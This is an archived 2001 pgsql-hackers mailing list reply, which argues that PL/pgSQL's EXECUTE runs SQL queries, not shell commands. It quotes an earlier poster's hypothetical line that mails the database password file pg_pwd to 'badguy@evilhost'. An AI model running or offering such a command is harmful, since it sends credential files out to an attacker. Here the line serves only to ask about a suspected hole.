Re: Security hole in PL/pgSQL - Mailing list pgsql-hackers

From Dominic J. Eidson
Subject Re: Security hole in PL/pgSQL
Date
Msg-id Pine.LNX.4.21.0101291142270.9025-100000@morannon.the-infinite.org
Whole thread Raw
In response to Re: Security hole in PL/pgSQL  (KuroiNeko <evpopkov@carrier.kiev.ua>)
List pgsql-hackers
On Mon, 29 Jan 2001, KuroiNeko wrote:

>  Sorry if I missed the point, but  if I got it right, Pl/Pgsql EXECUTE will
> allow execution of any program via exec*() call? If so, this will allow any
> (system) user to  execute arbitrary code as postgres  (system) user, right?
> If so, how can something like
> 
> EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';

Being as I was sort of the person who got EXECUTE into plpgsql... I find
it odd that people think you can execute random shell commands.. AFAICS,
EXECUTE is used to execute SQL queries (for when you don't want to cache
the query plan?) ...
 EXECUTE '' CREATE TABLE '' || NEW.dbs_name || '' (   '' || NEW.dbs_name || ''_id serial,     '' || NEW.dbs_name ||
''_namevarchar(20),   '' || NEW.dbs_name || ''_desc text,   '' || NEW.dbs_name || ''_qty int4 );'';
 

I don't see how anybody could think you are allowed to execute random
garbage through exec*()...


-- 
Dominic J. Eidson                                       "Baruk Khazad! Khazad ai-menu!" - Gimli
-------------------------------------------------------------------------------
http://www.the-infinite.org/              http://www.the-infinite.org/~dominic/



pgsql-hackers by date:

Previous
From: Tom Lane
Date:
Subject: Re: Open 7.1 items
Next
From: Bruce Momjian
Date:
Subject: Re: BLOB HOWTO??